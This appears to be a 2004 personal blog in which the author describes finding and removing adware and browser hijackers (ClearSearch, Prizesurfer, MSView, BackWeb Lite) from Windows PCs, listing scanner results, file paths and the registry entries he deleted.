Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete when empty
84VX2.MSViewCategory: Browser Helper Object
Author: [Mindset Interactive]
Release Date: 1/14/2003 0:00:00
Background Info: Click here
In File: C:\WINNT\LastGood\MSView.DLL
PVT: -122401757
MD5: 9de5c18a4ff98fce9c5da6ead8ec5f1b
Date: 12/14/2002 10:17:32 AM
Company Name: MSView Inc.
File Description: MSView module
File Version: 0, 0, 4, 12
Internal Name: MSView
Legal Copyright: Copyright 2001, 2002
Original Filename: MSView.DLL
Product Name: MSView
Product Version: 0, 0, 4, 12
File Analysis: Look up with MD5 (recommended) or PVT.
Certainty: Confirmed
Threatens: Liability
Risk: Moderate - this file can be executed!
Advice: Delete or quarantine
85ClearSearchCategory: Hijacker
Author: [Clear Search, Inc.]
Release Date: 1/20/2004 0:00:00
Background Info: Click here
In File: C:\WINNT\system32\ClrSchP012.exe
PVT: -1324841362
MD5: c9ca61949a0c9913ccb8883ad095c115
Date: 2/16/2004 9:57:08 PM
Company Name: Clear Search
File Description: Loader
File Version: 1, 0, 0, 3
Internal Name: Loader
Legal Copyright: Copyright 2003
Original Filename: Loader.exe
Product Name: Loader
Product Version: 1, 0, 0, 3
File Analysis: Look up with MD5 (recommended) or PVT.
Certainty: Confirmed
Threatens: Liability
Risk: Moderate - this file can be executed!
Advice: Delete or quarantine


Depressing.

Posted by torque at 3:17 PM | Comments (11) | TrackBack

Hijacked search results by featured-results.com

A very annoying thing. I thought this might have been coming from prizesurfer.exe in the last post, but I don't think it is. Here's the symptom, you go to Google, do a search, and surprise, out pops some quasi-helpful paid links not from Google. Yes, you have been hijacked.

Here's what it looks like for a search on "mesothelioma" from Google.

featured-results.PNG

Where does this come from? It appears to be some sort of IE plugin. A scanning of C:\WINNT\Downloaded Program Files reveals

nameidCodeBase
{26E8361F-BCE7-4F75-A347-98C88B418322}http://dst.trafficsyndicate.com/Dnl/T_50026/QDow.cab
{41F17733-B041-4099-A042-B518BB6A408C}http://a1540.g.akamai.net/7/1540/52/20021126/qtinstall.info.apple.com/borris/us/win/QuickTimeInstaller.exe
Mediachip AD Player Control{2D0C7226-747E-11D6-83F0-00E04C4A2F90}http://www2.sznews.com/movies/MCADPlayer.cab

among others. The rest looks ok. I started by killing the trafficsyndicate.com script, which was "damaged" anyway. Hey, how about that, I think that was it.

Update
It wasn't. I turned on the computer the next day to find the same problem. The offender turned out to be ClearSearch which you can get rid of by following the instructions in pestpatrol.

Update to the update
I was able to uninstall ClearSearch, but that wasn't it either.

Posted by torque at 12:27 AM | Comments (4) | TrackBack

June 5, 2004

Prizesurfer (prizesurfer.exe, rcsync.exe)

If you are experiencing strange pop-up ads, seemingly unaffected by pop-up blockers, you might have Prizesurfer installed on your computer. Fortunately, you can detect it simply by looking at processes using Windows Task Manager. Along with prizesurfer.exe, you might also see rcsync.exe. According to liutilities, it "allows users to win cash and prizes just for surfing the Internet and shopping online". I suspect the only prizes you are going to win are ads on your computer.

wtm_prizesurfer.PNG

I suspect that this might be the cause of the pop-up ads from www.featured-results.com. To replicate the behavior, do a search on Google for something like "mesothelioma". A full-page pop-up will pop up and will look like this:

featured-results.PNG

Do not click on the ads! We don't want to enrich these guys any more. Go ahead and kill rcsync.exe and prizesurfer.exe from the Windows Task Manager by right clicking and selecting "End Process". Now, try the Google search again. Shoot, it still does it. So scratch that. The featured-results thing is another problem. To finish up rcsync and prize surfer, per pestpatrol, go to the start button, select Run, and then type regedit. Browse to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and you'll see the following:

prizesurfer_regedit.PNG

Notice PrizeSurfer and RCSync. Now we could do the kill ourselves, but it turns out, conveniently, that the developers of PrizeSurfer, Pink Sands Media Group, offer an uninstaller (gee, I wonder what else it installs...). But, the link they give, http://www.prizesurfer.com/prkzesurfer_uninstall.zip, conveniently doesn't work - and may even cause your computer to hang. So, moving on, delete the two registry entries and then reboot.

I was unable to locate passkey.dll to unregister (it was gone) nor was I able to find the first five HKEY_CLASSES_ROOT entries. It maybe that Spybot already removed these.


HKEY_CLASSES_ROOT\clsid\{7b91df1f-96e8-42ba-ab39-e1db9ce9f371}
HKEY_CLASSES_ROOT\interface\{6d846abd-9ece-44ad-bb1b-e1b0b20e352f}
HKEY_CLASSES_ROOT\passkey.validate
HKEY_CLASSES_ROOT\passkey.validate.1
HKEY_CLASSES_ROOT\typelib\{be055af3-6567-4678-a901-d4b7d92e55fe}
HKEY_LOCAL_MACHINE\software\microsoft\code store database\distribution units\{7b91df1f-96e8-42ba-ab39-e1db9ce9f371}
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\moduleusage\c:/windows/downloaded program files/passkey.dll
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\prizesurfer
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\rcsync
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\shareddlls\c:\windows\downloaded program files\passkey.dll
All clear. Finally, erase everything in C:/Program Files/RCPrograms. Done.

Posted by torque at 11:42 PM | Comments (0) | TrackBack

Logitech and BackWeb Lite

You can add Logitech to your list of sorta sketchy companies. Along with their so-called "free" desktop messenger comes BackWeb Lite. Spybot caught this in my father-in-law's PC. Despite multiple attempts of fixing the problem, BackWeb kept cropping up scan after scan. Per pestpatrol,

BackWeb is a generic, background downloading tool that software vendors can incorporate into their product to download data (e.g. product updates) to the user's PC. Its operation depends on the instructions given to it by the individual software vendor who bundles it.
You can imagine this being used for good and evil. It could be used for upgrading the mouse driver on the fly, for example, or sending you advertising on your screen, browser, screensaver.

According to Backweb,

BackWeb's technology allows software upgrades and product promotions to be seamlessly delivered and downloaded to Logitech customers using BackWeb's patented Polite communications technology, which avoids disrupting the user by downloading content in the background during network idle time. Since upgrades are now delivered directly to the end-user, Logitech can enhance the customer experience and reduce service costs and time to market. (emphasis added).
You can find the culprit at C:\Program
Files\Logitech\Desktop Messenger\8876480\Program\BackWeb-8876480.exe
.

Posted by torque at 11:11 PM | Comments (26) | TrackBack